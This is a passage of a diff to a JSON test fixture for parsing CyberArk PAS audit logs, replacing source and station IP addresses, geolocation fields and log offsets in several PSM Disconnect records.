Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:54</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 06:49:54",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm disconnect",
@@ -625,7 +590,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 18154,
+        "log.offset": 18142,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -635,24 +600,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -683,23 +645,18 @@
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_duration": "00:00:54",
         "cyberarkpas.audit.extra_details.session_id": "47747796-03e1-4a11-af39-ab56c00e7732",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:51:35Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:51:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:51:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:51:35</Timestamp>\n    <IsoTimestamp>2021-03-14T13:51:35Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 14 06:51:35",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm disconnect",
@@ -721,7 +678,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 21738,
+        "log.offset": 21720,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -731,24 +688,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -777,23 +731,18 @@
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_duration": "00:01:35",
         "cyberarkpas.audit.extra_details.session_id": "29f340df-89e9-405a-beae-0216390cda42",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:33:30Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:30</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:30</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 03:33:30",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm disconnect",
@@ -815,7 +764,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 25322,
+        "log.offset": 25298,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -825,24 +774,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -871,23 +817,18 @@
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_duration": "00:01:13",
         "cyberarkpas.audit.extra_details.session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:34:50Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:34:50</Timestamp>\n    <IsoTimestamp>2021-03-15T10:34:50Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:34:50</Timestamp>\n    <IsoTimestamp>2021-03-15T10:34:50Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 03:34:50",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm disconnect",
@@ -909,7 +850,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 28386,
+        "log.offset": 28356,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -919,24 +860,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -965,23 +903,18 @@
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_duration": "00:37:10",
         "cyberarkpas.audit.extra_details.session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T11:12:09Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "PSM Disconnect",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 04:12:09</Timestamp>\n    <IsoTimestamp>2021-03-15T11:12:09Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 04:12:09</Timestamp>\n    <IsoTimestamp>2021-03-15T11:12:09Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 04:12:09",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "psm disconnect",
@@ -1003,7 +936,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 31450,
